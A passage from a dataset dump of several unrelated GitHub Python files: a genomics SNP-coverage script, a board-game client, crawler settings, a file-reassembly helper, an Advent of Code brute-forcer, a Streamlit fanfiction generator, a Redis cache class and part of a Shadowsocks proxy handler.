mpileup):\n self.chr = chr\n self.v4cordinate = v4cordinate\n self.maf = maf\n self.geno = geno\n self.depth = depth\n self.mpileup = mpileup\n def __str__(self):\n return (self.chr + \"\\t\" + str(self.v4cordinate) + \"\\t\" + str(self.maf) + \"\\t\" + str(self.geno) + \"\\t\" + str(self.depth) + \"\\t\" + str(self.mpileup))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='count number of based overlap between CNS bam output and the eQTL result,'\n 'please input the vcf file and the eqtl for one chromosome only')\n\n parser.add_argument(\"-g\", \"--genome\",\n dest=\"genome\",\n type=str,\n default=\"\",\n help=\"the masked reference genome file\")\n\n parser.add_argument(\"-b\", \"--bam\",\n dest=\"bam\",\n type=str,\n default=\"\",\n help=\"the output of and-CNS pipeline in bam format\")\n\n parser.add_argument(\"-c\", \"--chr\",\n dest=\"chr\",\n type=str,\n default=\"\",\n help=\"the chromosome to be analysised\")\n\n parser.add_argument(\"-s\", \"--mask\",\n dest=\"mask\",\n type=str2bool,\n default=True,\n help=\"only count the non-masking region SNP and genome length\")\n\n parser.add_argument(\"-m\", \"--miss\",\n dest=\"miss\",\n type=str,\n default=\"\",\n help=\"the missing statistics using V4 coordinate\")\n\n parser.add_argument(\"-v\", \"--vcf\",\n dest=\"vcf\",\n type=str,\n default=\"\",\n help=\"the B73 v4 variant file in vcf format\")\n\n parser.add_argument(\"-f\", \"--maf\",\n dest=\"maf\",\n type=str,\n default=\"\",\n help=\"the MAF statistics using V4 coordinate\")\n\n args = parser.parse_args()\n\n\n if args.genome == \"\":\n print(\"Error: please specify --genome\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.bam == \"\":\n print(\"Error: please specify --bam\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.miss == \"\":\n print(\"Error: please specify --miss\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.maf == \"\":\n print(\"Error: please specify --maf\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.vcf == \"\":\n print(\"Error: please specify --vcf\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.chr == \"\":\n print(\"Error: please specify --chr\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n reference_genome = readFastaFile(args.genome)\n print(\"reference genome reading done\", file=sys.stderr)\n\n chr = args.chr\n id_to_v4cordinate_dict = dict()\n with open(args.vcf) as f:\n for line in f:\n if line[0] is not '#':\n elements = line.split('\\t')\n if elements[0] == chr:\n id_to_v4cordinate_dict[elements[2]] = elements[1]\n\n\n sig_v4cordinate_dict = dict()\n totalDepth = 0\n totalMpileup = 0\n # print(\"SNP reading done\", file=sys.stderr)\n seq = reference_genome[chr]\n seq = re.sub(\"\\\\s\", \"\", seq)\n seq = re.sub(\"-\", \"\", seq)\n if args.mask:\n # read the VCF file begin\n with open(args.maf) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if chr == elements[0] and (reference_genome[chr][int(position)-1] is not 'n') and (elements[4][0] is not 'N'):\n s = SNP(elements[0], int(position), float(elements[4]), -1, 0, 0)\n sig_v4cordinate_dict[position] = s\n # print(\"vcf file reading done\", file=sys.stderr)\n with open(args.miss) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if chr == elements[0] and (reference_genome[chr][int(position)-1] is not 'n') and (position in sig_v4cordinate_dict) and (elements[4][0] is not 'N'):\n sig_v4cordinate_dict[position].geno = float(elements[4])\n\n for line2 in subprocess.run(['samtools', 'depth', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[2]) > 0 and (reference_genome[chr][int(elements2[1])-1] is not 'n'):\n totalDepth = totalDepth + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].depth = int(elements2[2])\n # print()\n # print(line2)\n # print(sig_v4cordinate_dict[position])\n # print(\"samtools depth done\", file=sys.stderr)\n\n for line2 in subprocess.run(['samtools', 'mpileup', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[3]) > 0 and (reference_genome[chr][int(elements2[1])-1] is not 'n'):\n totalMpileup = totalMpileup + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].mpileup = int(elements2[3])\n seq = re.sub(\"n\", \"\", seq)\n else:\n with open(args.maf) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if (chr == elements[0] and (elements[4][0] is not 'N')):\n s = SNP(elements[0], int(position), float(elements[4]), -1, 0, 0)\n sig_v4cordinate_dict[position] = s\n # print(\"vcf file reading done\", file=sys.stderr)\n with open(args.miss) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if (chr == elements[0] and (elements[4][0] is not 'N') and (position in sig_v4cordinate_dict) ):\n sig_v4cordinate_dict[position].geno = float(elements[4])\n\n for line2 in subprocess.run(['samtools', 'depth', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[2]) > 0:\n totalDepth = totalDepth + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].depth = int(elements2[2])\n # print(\"samtools depth done\", file=sys.stderr)\n\n for line2 in subprocess.run(['samtools', 'mpileup', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[3]) > 0:\n totalMpileup = totalMpileup + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].mpileup = int(elements2[3])\n\n for position in sig_v4cordinate_dict:\n if sig_v4cordinate_dict[position].mpileup > 0:\n print(\"mpileup\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n else:\n print(\"non-mpileup\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n if sig_v4cordinate_dict[position].depth > 0:\n print(\"depth\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n else:\n print(\"non-depth\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n # print(sig_v4cordinate_dict[position])\n","repo_name":"baoxingsong/CNSpublication","sub_path":"CNS_analysis/cnsWithSNPsMaf.py","file_name":"cnsWithSNPsMaf.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72609777157","text":"import json\nimport random\n\nfrom ahriman import constants\nfrom ahriman import logger\nfrom ahriman.constants import GameAction\nfrom ahriman.game import Board\nfrom ahriman.game.cardholder import CardHolder\nfrom .logic import Logic\n\n\nclass Game:\n OBJECTS_DICT = {}\n RULES_DICT = {}\n\n @staticmethod\n def parse_logic():\n if len(Game.OBJECTS_DICT) == 0:\n Game.parse_objects()\n Game.parse_rules()\n\n @staticmethod\n def parse_objects():\n try:\n with open(constants.LOGIC_OBJECTS, 'r') as file:\n Game.OBJECTS_DICT = json.load(file)\n\n try:\n for name_tile, tile in Game.OBJECTS_DICT['tiles'].items():\n if len(tile['resources']) > 1:\n logger.error('multiple resource on one tile', name_tile)\n raise NotImplementedError('multiple resource on one tile')\n\n Game.convert_textures(tile)\n\n if len(tile['resources']) > 0:\n tile['textures']['symbol'] = '_'.join(('symbols', list(tile['resources'])[0]))\n\n for name_node, node in Game.OBJECTS_DICT['nodes'].items():\n Game.convert_textures(node)\n\n for name_card, card in Game.OBJECTS_DICT['cards'].items():\n card['texture'] = '_'.join(('cards', name_card))\n\n except KeyError as e:\n logger.error('invalid objects.json - ', str(e))\n raise KeyError('invalid objects.json')\n\n logger.confirm('objects successfully loaded !')\n\n except FileNotFoundError as e:\n logger.error(e, title=\"in tiles parsing\")\n raise e\n\n @staticmethod\n def convert_textures(board_object_dict):\n for tex_group, tex_name in board_object_dict['textures'].items():\n board_object_dict['textures'][tex_group] = '_'.join((constants.TEXTURE_CLASS[tex_group], tex_name))\n\n @staticmethod\n def parse_rules():\n try:\n with open(constants.LOGIC_RULES, 'r') as file:\n Game.RULES_DICT = json.load(file)\n\n logger.confirm('rules successfully loaded !')\n\n except FileNotFoundError as e:\n logger.error(e, title=\"in rules parsing\")\n raise e\n\n def __init__(self, window, player_num, total_players=2):\n self.logic = Logic(total_players)\n\n self.player_num = player_num\n\n self.initialized = False\n self.send_game_action = window.gameClient.send_game_action\n\n self.graphic_board = Board(window, rows=Game.RULES_DICT['board']['rows'],\n cols=Game.RULES_DICT['board']['cols'])\n self.card_holder = CardHolder(window)\n # TODO remove this and correctly load the cards\n self.card_holder.draw_hand([Game.OBJECTS_DICT['cards']['flag']] * 3)\n\n self.highlighted_tile = None\n self.selected_tile = None\n self.last_click = 0\n self.highlighted_node = None\n self.selected_node = None\n self.highlighted_card = None\n self.selected_card = None\n\n self.selected_actions = [None] * total_players\n\n @property\n def state_dict(self):\n end_turn = self.selected_actions[self.player_num] is not None and not self.logic.turn_validated[self.player_num]\n return {\n 'tiles': self.logic.owned_tiles,\n 'captures': self.logic.captures,\n 'points': self.logic.victory_points,\n 'end_turn_enabled': end_turn,\n }\n\n def validate_turn(self, player_num=None):\n if player_num is None:\n if self.selected_actions[self.player_num] is not None:\n self.logic.turn_validated[self.player_num] = True\n self.send_game_action(action=constants.GameAction.TURN_DONE)\n\n else:\n if self.logic.turn_validated[player_num]:\n logger.warning('a player validated his turn twice')\n self.logic.turn_validated[player_num] = True\n\n if all(self.logic.turn_validated):\n self.send_game_action(action=self.selected_actions[self.player_num][0],\n coord=self.selected_actions[self.player_num][1])\n\n def perform(self, player, action, coord):\n try:\n if not self.logic.can_perform(player, action, coord):\n return False\n except TypeError:\n return False\n\n self.selected_actions[player] = (action, coord)\n\n if not any([action is None for action in self.selected_actions]):\n to_update = self.logic.resolve(self.selected_actions)\n for coord in to_update:\n self.graphic_board[coord].change_owner(self.logic[coord].owner)\n # TODO animate the turn resolution\n\n self.selected_actions = [None] * self.logic.total_players\n self.select_node(None)\n\n return True\n\n def disconnect(self, player):\n self.logic.turn_validated[player] = False\n\n def add_node(self, coord, owner=-2):\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], -2)\n self.logic.add_node(coord, owner)\n\n def add_tile(self, tile_coord, tile_name, owner=-1):\n self.graphic_board.tiles[tile_coord].set_object(Game.OBJECTS_DICT['tiles'][tile_name], owner)\n self.logic.add_tile(tile_coord, tile_name, owner)\n\n def init_board(self):\n # TODO is this half splitting necessary? NO\n total_half = (len(self.graphic_board.tiles)) // 2\n total_weight = sum(Game.RULES_DICT['board']['init'].values())\n\n left_half = []\n for tile, weight in Game.RULES_DICT['board']['init'].items():\n stack = [tile] * int(round(total_half * weight / total_weight))\n left_half.extend(stack)\n\n if len(left_half) < total_half:\n left_half.extend(\n [list(Game.RULES_DICT['board']['init'])[0]] * (total_half - len(left_half)))\n elif len(left_half) > total_half:\n left_half.pop()\n\n right_half = list(left_half)\n random.shuffle(right_half)\n random.shuffle(left_half)\n\n def put_left(tile_coord):\n put_tile = left_half.pop()\n self.add_tile(tile_coord, put_tile)\n\n def put_right(tile_coord):\n put_tile = right_half.pop()\n self.add_tile(tile_coord, put_tile)\n\n for coord in self.graphic_board.tiles.keys():\n if coord[1] == 2 * coord[0] + 1 - self.graphic_board.cols:\n if coord[1] < self.graphic_board.rows - 1:\n put_right(coord)\n elif coord[1] > self.graphic_board.rows - 1:\n put_left(coord)\n else:\n self.add_tile(coord, Game.RULES_DICT['board']['fill'])\n elif coord[1] < 2 * coord[0] + 1 - self.graphic_board.cols:\n put_right(coord)\n elif coord[1] > 2 * coord[0] + 1 - self.graphic_board.cols or coord[1] > self.graphic_board.rows:\n put_left(coord)\n\n for coord in self.graphic_board.nodes.keys():\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], -2)\n self.add_node(coord)\n\n self.initialized = True\n\n def select_tile(self, tile):\n if self.selected_tile != tile:\n if self.selected_tile is not None:\n self.graphic_board[self.selected_tile].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.selected_tile].set_select_tex('none')\n\n if tile is not None:\n self.graphic_board[tile].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[tile].set_select_tex('UI_select')\n\n self.selected_tile = tile\n\n def select_node(self, node):\n if self.selected_node != node:\n if self.selected_node is not None:\n self.graphic_board[self.selected_node].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.selected_node].set_select_tex('none')\n\n if node is not None:\n self.graphic_board[node].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[node].set_select_tex('UI_select_node', self.player_num)\n\n self.selected_node = node\n\n def highlight_node(self, node):\n if self.highlighted_node != node:\n if self.highlighted_node is not None and self.highlighted_node != self.selected_node:\n self.graphic_board[self.highlighted_node].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.highlighted_node].set_select_tex('none')\n\n if node is not None and node != self.selected_node:\n self.graphic_board[node].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[node].set_select_tex('UI_highlight_node', self.player_num)\n\n self.highlighted_node = node\n\n def highlight_tile(self, tile):\n if self.highlighted_tile != tile:\n if self.highlighted_tile is not None and self.highlighted_tile != self.selected_tile:\n self.graphic_board[self.highlighted_tile].change_color(\n constants.TILE_BASE_COLOR)\n\n if tile is not None and tile != self.selected_tile:\n self.graphic_board[tile].change_color(constants.TILE_HIGHLIGHT_COLOR)\n\n self.highlighted_tile = tile\n\n def select_card(self, card):\n if self.selected_card != card:\n if self.selected_card is not None:\n if self.highlighted_card is not None and self.highlighted_card == self.selected_card:\n self.card_holder.select_card(self.selected_card, False, full=False)\n else:\n self.card_holder.select_card(self.selected_card, False, full=True)\n\n if card is not None:\n if self.highlighted_card is not None and self.highlighted_card == card:\n self.card_holder.select_card(card, True, full=False)\n else:\n self.card_holder.select_card(card, True, full=True)\n\n self.selected_card = card\n\n def highlight_card(self, card):\n if self.highlighted_card != card:\n if self.highlighted_card is not None and self.highlighted_card != self.selected_card:\n self.card_holder.select_card(self.highlighted_card, False)\n\n if card is not None and card != self.selected_card:\n self.card_holder.select_card(card, True)\n\n self.highlighted_card = card\n\n def on_mouse_click(self, x, y):\n if self.initialized:\n if not self.logic.turn_validated[self.player_num]:\n card = self.card_holder.mouse_to_card(x, y)\n self.select_card(card)\n if card is not None:\n self.select_node(None)\n else:\n node = self.graphic_board.mouse_to_node_coord(x, y)\n if node is not None and self.perform(self.player_num, GameAction.CONQUER, node):\n self.select_node(node)\n\n def on_mouse_move(self, x, y):\n if self.initialized:\n\n card = self.card_holder.mouse_to_card(x, y)\n self.highlight_card(card)\n\n if card is None:\n node = self.graphic_board.mouse_to_node_coord(x, y)\n self.highlight_node(node)\n\n else:\n self.highlight_node(None)\n\n def on_mouse_scroll(self, mouse_x, mouse_y, scroll_x, scroll_y):\n if self.initialized:\n self.graphic_board.on_mouse_scroll(mouse_x, mouse_y, scroll_x, scroll_y)\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n if self.initialized:\n self.graphic_board.on_mouse_drag(x, y, dx, dy, buttons, modifiers)\n\n def on_resize(self, width, height):\n self.graphic_board.on_resize(width, height)\n\n def update(self, dt, move):\n self.graphic_board.update(dt, move)\n self.card_holder.update()\n\n def draw(self):\n self.graphic_board.draw()\n self.card_holder.draw()\n\n def load_state(self, state):\n self.logic = state\n for coord, tile in state.logic_tiles_board.items():\n self.graphic_board.tiles[coord].set_object(Game.OBJECTS_DICT['tiles'][tile.type],\n owner=tile.owner)\n for coord, node in state.logic_nodes_board.items():\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], node.owner)\n\n self.initialized = True\n\n def delete(self):\n self.graphic_board.delete()\n","repo_name":"FrailHand/Ahriman","sub_path":"client/ahriman/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31887455377","text":"# coding: utf-8\n\n## default session id\nBOT = \"spider\"\n\n## HEADERS\nUSER_AGENT = \"Spider Bot\"\nDEFAULT_HEADERS = {\n \"user-agent\": USER_AGENT,\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"accept-encoding\": \"gzip, deflate\",\n \"accept-language\": \"en\",\n}\n\n## robots.txt\nROBOTSTXT_OBEY = True\n\n## COOKIES\nCOOKIES_DEBUG = False\nCOOKIES_STORE_ENABLED = True\nCOOKIES_STORE_DB = None\nCOOKIES_CLEAR = False\n\n## TIMEOUT and DELAY\nDOWNLOAD_TIMEOUT = 30\nDOWNLOAD_DELAY = 0\n\n## DOWNLOADER_MIDDLEWARES\nDOWNLOADER_MIDDLEWARES = []\n\n## ITEM_PIPELINES\nITEM_PIPELINES = []\n\n## REDIRECT and RETRY\nREDIRECT_ENABLED = True\nRETRY_TIMES = 3\nRETRY_HTTP_CODES = [500, 502, 503, 504, 522, 524, 408, 429]\n\n## LOG\nLOG_ENABLED = False\nLOG_ENCODING = \"utf-8\"\nLOG_FILE = None\nLOG_FORMAT = \"%(asctime)s %(levelname)s [%(name)s] %(message)s\"\n\n## thread\nCONCURRENT_REQUESTS = 16\n\n# DFO or BFO\nDEPTH_PRIORITY = 1","repo_name":"glamas/pycurl_session","sub_path":"pycurl_session/spider/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"14414861493","text":"from sys import argv\r\nimport os\r\n\r\nRESULT_FILE = 'ft_fun.c'\r\n\r\n\r\ndef read_pcap_file(file_name):\r\n with open(file_name, \"r\") as file:\r\n file_content = file.readlines()\r\n if \"//file\" in file_content[-1]:\r\n return int(file_content[-1].replace(\"//file\", \"\")), file_content\r\n else:\r\n raise Exception(f\"File: '{file_name}' is invalid.\")\r\n\r\n\r\ndef create_file_from_dir(dir_name):\r\n files = {}\r\n last_index = 0\r\n \r\n for file_name in os.listdir(dir_name):\r\n file_name = os.path.join(dir_name, file_name)\r\n if os.path.isfile(file_name):\r\n file_index, file_content = read_pcap_file(file_name)\r\n files[file_index] = file_content\r\n if last_index < file_index:\r\n last_index = file_index\r\n with open(RESULT_FILE, \"w\") as file:\r\n for i in range(1, last_index + 1):\r\n file.writelines(files[i])\r\n file.write(\"\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n if len(argv) == 2:\r\n print(f\"Reading files from {argv[1]}\")\r\n create_file_from_dir(argv[1])\r\n except Exception as e:\r\n print(e)\r\n","repo_name":"dburtnja/boot2root","sub_path":"unfan_fun.py","file_name":"unfan_fun.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"43695678365","text":"all_items = \"\"\"monolith\nastronaut ice cream\nhologram\nornament\nasterisk\nfixed point\ndark matter\nantenna\n\"\"\".splitlines()\n\nimport functools\nimport itertools\n\n# clean slate\nfor item in all_items:\n print(f'drop {item}')\n\nfor comb_length in range(1, len(all_items)+1):\n\n for comb_items in itertools.combinations(all_items, comb_length):\n print()\n\n for item in comb_items:\n print(f'take {item}')\n print(\"east\") \n # game will quit when correct items picked up\n for item in comb_items:\n print(f'drop {item}')\n print()","repo_name":"sonneveld/advent-of-code","sub_path":"advent19/25/weight_brute_force.py","file_name":"weight_brute_force.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"8982915002","text":"#\n# Streamlit app for text generation for NLP Project\n# Andrew Zhou\n#\n# Some code taken from demos from https://github.com/streamlit/\n#\n\nimport streamlit as st\nimport torch\nst.beta_set_page_config(layout=\"wide\")\n\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\nfrom streamlit.report_thread import get_report_ctx\n\n# tokenizer and model must be in the directory\n@st.cache(allow_output_mutation=True)\ndef init():\n tokenizer = GPT2Tokenizer.from_pretrained(\"tokenizer\")\n model = GPT2LMHeadModel.from_pretrained(\"model\")\n return {\"tokenizer\": tokenizer, \"model\": model}\n\nctx = get_report_ctx()\ncache = init()\nst.markdown(\"

Yip Yip!: A Fanfiction Generator

\", unsafe_allow_html=True)\n\nst.markdown(\"

Input a starting seed and I'll generate text in the style of an Avatar: The Last Airbender fanfiction!

\", unsafe_allow_html=True)\nst.markdown(\"
\", unsafe_allow_html=True)\n\ncss = \"\"\"\n \n \"\"\"\n\nst.markdown(css, unsafe_allow_html=True)\n\n_, col_1, _, col_3, _ = st.beta_columns((0.1, 1, 0.1, 1, 0.1))\n\n\nimport streamlit.components.v1 as components\n\n\nwith col_1:\n starter_header = st.markdown(\"

Give me some starter text!

\", unsafe_allow_html=True)\n starter_text = st.empty()\n generate_fic = st.button(\"Generate a fic!\")\n length = st.number_input(\"How many tokens should the fic be?\", 200)\n\n\nwith col_3:\n recommend_header = st.markdown(\"

Your fic:

\", unsafe_allow_html=True)\n fic_container = st.beta_container()\n\nwith col_1:\n txt = starter_text.text_area(\"\", \"Zuko\", height=375)\n\ntemperature = 0.8\ntop_p = 0.94\ntop_k = 60\nrep_pen = 1.2\nnum_return = 1\n\nif generate_fic:\n output_length = length\n md_recs = \"
\"\n input_ids = cache[\"tokenizer\"].encode(str(txt), return_tensors=\"pt\")#.cuda()\n\n output = cache[\"model\"].generate(\n input_ids=input_ids,\n max_length=output_length,\n temperature=temperature,\n top_k=top_k,\n top_p=top_p,\n repetition_penalty=rep_pen,\n do_sample=True,\n num_return_sequences=num_return\n )[0]\n md_recs += cache[\"tokenizer\"].decode(output, skip_special_tokens=True)\n\n md_recs += \"
\"\n fic_container.markdown(md_recs, unsafe_allow_html=True)\n","repo_name":"zhouandrewc/fanfic-nlp","sub_path":"app/fanfic_generator.py","file_name":"fanfic_generator.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73715182598","text":"import json\r\nimport datetime\r\nfrom decouple import config\r\nfrom redis import Redis\r\n\r\n\r\nclass RedisCache:\r\n def __init__(self):\r\n \"\"\"Iniciar a Classe Cache Redis\"\"\"\r\n self.redis = Redis(\r\n host= config('REDIS_HOST'),\r\n port= config('REDIS_PORT'),\r\n username= config('REDIS_USERNAME'),\r\n password= config('REDIS_PASSWORD'),\r\n db=0)\r\n\r\n def add_cache(self, product, list_products):\r\n \"\"\" Função adicionar dados de registro no Redis e definir o tempo de expiração para chave \"\"\"\r\n days = datetime.timedelta(minutes=10)\r\n seconds = days.total_seconds()\r\n try:\r\n json_data = json.dumps(list_products)\r\n bytes_data = json_data.encode()\r\n\r\n self.redis.set(product, bytes_data)\r\n self.redis.expire(product, time=int(seconds))\r\n print('Registro adicionado a cache redis')\r\n \r\n except Exception as e:\r\n raise Exception('Obteve os seguinte erro:', e)\r\n\r\n def get_cache(self, product):\r\n \"\"\" Função obter dados de registro no Redis.\"\"\"\r\n prod = self.redis.get(product)\r\n json_data = json.loads(prod)\r\n return json_data\r\n\r\n def registry_exists(self, product):\r\n \"\"\" Função para verificar se existem dados de registro no Redis.\"\"\"\r\n prod_exist = self.redis.exists(product)\r\n return prod_exist\r\n\r\n def delete_registry(self, product):\r\n \"\"\" Função para excluir dados do registro no Redis.\"\"\"\r\n self.redis.delete(product)\r\n print('Registro em cache deletado')\r\n ","repo_name":"By-Lucas/Project-Devnology-Api-WebScraping","sub_path":"apps/controllers/rediscache.py","file_name":"rediscache.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"21996650794","text":"import asyncio\nimport logging\nimport socket\nimport struct\n\nfrom shadowsocks import protocol_flag as flag\nfrom shadowsocks.cipherman import CipherMan\nfrom shadowsocks.utils import parse_header\n\nlogger = logging.getLogger(__name__)\n\n\nclass LocalHandler:\n \"\"\"\n 事件循环一共处理五个状态\n\n STAGE_INIT 初始状态 socket5握手\n STAGE_CONNECT 连接建立阶段 从本地获取addr 进行dns解析\n STAGE_STREAM 建立管道(pipe) 进行socket5传输\n STAGE_DESTROY 结束连接状态\n STAGE_ERROR 异常状态\n \"\"\"\n\n STAGE_INIT = 0\n STAGE_CONNECT = 1\n STAGE_STREAM = 2\n STAGE_DESTROY = -1\n STAGE_ERROR = 255\n\n def __init__(self, port):\n super().__init__()\n\n self.port = port\n self.cipher_man = None\n\n self._stage = None\n self._peer = None\n self.remote = None\n self.transport = None\n self._transport_protocol = None\n self._transport_protocol_human = None\n self._is_closing = False\n self.connect_buffer = bytearray()\n\n def _init_transport(self, transport: asyncio.Transport, peer, protocol):\n self._stage = self.STAGE_INIT\n self.transport = transport\n self._peer = peer\n self._transport_protocol = protocol\n if protocol == flag.TRANSPORT_TCP:\n self._transport_protocol_human = \"tcp\"\n else:\n self._transport_protocol_human = \"udp\"\n\n def close(self):\n self._stage = self.STAGE_DESTROY\n if self._is_closing:\n return\n self._is_closing = True\n\n if self._transport_protocol == flag.TRANSPORT_TCP:\n self.transport and self.transport.close()\n self.cipher_man and self.cipher_man.close()\n self.remote and self.remote.close()\n\n def write(self, data: bytes):\n if self._transport_protocol == flag.TRANSPORT_TCP:\n if self.transport.is_closing():\n return\n self.transport.write(data)\n else:\n self.transport.sendto(data, self._peer)\n\n def handle_connection_made(self, transport_protocol, transport, peername):\n self._init_transport(transport, peername, transport_protocol)\n\n def handle_eof_received(self):\n self.close()\n\n def handle_connection_lost(self, exc):\n self.close()\n\n def handle_data_received(self, data):\n \"\"\"\n 异步wrapper\n :param data:\n :return:\n \"\"\"\n if not self.cipher_man:\n self.cipher_man = CipherMan.get_cipher_by_port(self.port, self._transport_protocol, self._peer)\n\n try:\n data = self.cipher_man.decrypt(data)\n except Exception as e:\n logger.exception(\n f\"decrypt data error:{e} remote:{self._peer},type:{self._transport_protocol_human} closing...\"\n )\n self.close()\n return\n\n if not data:\n return\n\n if self._stage == self.STAGE_INIT:\n asyncio.create_task(self._handle_stage_init(data))\n elif self._stage == self.STAGE_CONNECT:\n self._handle_stage_connect(data)\n elif self._stage == self.STAGE_STREAM:\n self._handle_stage_stream(data)\n elif self._stage == self.STAGE_ERROR:\n self.close()\n elif self._stage == self.STAGE_DESTROY:\n self.close()\n else:\n logger.warning(f\"unknown stage:{self._stage}\")\n\n async def _handle_stage_init(self, data):\n atype, dst_addr, dst_port, header_length = parse_header(data)\n if not all([atype, dst_addr, dst_port, header_length]):\n logger.warning(f\"parse_header_error atype: {flag.get_atype_for_human(atype)} port: {self.port}\")\n self.close()\n return\n else:\n logger.info(\n \"parse_header_success atype: {} {} from: {} dst: {}:{}\".format(\n self._transport_protocol_human, flag.get_atype_for_human(atype), self._peer[0], dst_addr, dst_port,\n )\n )\n payload = data[header_length:]\n\n loop = asyncio.get_running_loop()\n if self._transport_protocol == flag.TRANSPORT_TCP:\n self._stage = self.STAGE_CONNECT\n self._handle_stage_connect(payload)\n try:\n task = loop.create_connection(lambda: RemoteTCP(self), dst_addr, dst_port)\n _, remote_tcp = await asyncio.wait_for(task, 5)\n except Exception as e:\n self._stage = self.STAGE_ERROR\n self.close()\n logger.warning(f\"connection_failed, {type(e)} e: {dst_addr}:{dst_port}\")\n else:\n self.remote = remote_tcp\n else:\n try:\n task = loop.create_datagram_endpoint(\n lambda: RemoteUDP(dst_addr, dst_port, payload, self), remote_addr=(dst_addr, dst_port),\n )\n await asyncio.wait_for(task, 5)\n except Exception as e:\n self._stage = self.STAGE_ERROR\n self.close()\n logger.warning(f\"connection_failed, {type(e)} e: {dst_addr}:{dst_port}\")\n\n def _handle_stage_connect(self, data):\n # 在握手之后,会耗费一定时间来来和remote建立连接,但是ss-client并不会等这个时间\n if not self.remote or self.remote.ready is False:\n self.connect_buffer.extend(data)\n else:\n self._stage = self.STAGE_STREAM\n self._handle_stage_stream(data)\n\n def _handle_stage_stream(self, data):\n self.remote.write(data)\n\n\nclass LocalTCP(asyncio.Protocol):\n \"\"\"\n Local Tcp Factory\n \"\"\"\n\n def __init__(self, port):\n self.port = port\n self._handler = None\n self._transport = None\n\n def _init_handler(self):\n self._handler = LocalHandler(self.port)\n\n def __call__(self):\n local = LocalTCP(self.port)\n local._init_handler()\n return local\n\n def pause_writing(self):\n self._handler.remote.transport.pause_reading()\n\n def resume_writing(self):\n self._handler.remote.transport.resume_reading()\n\n def connection_made(self, transport):\n self._transport = transport\n peer = self._transport.get_extra_info(\"peername\")\n self._handler.handle_connection_made(flag.TRANSPORT_TCP, transport, peer)\n\n def data_received(self, data):\n self._handler.handle_data_received(data)\n\n def eof_received(self):\n self._handler.handle_eof_received()\n\n def connection_lost(self, exc):\n 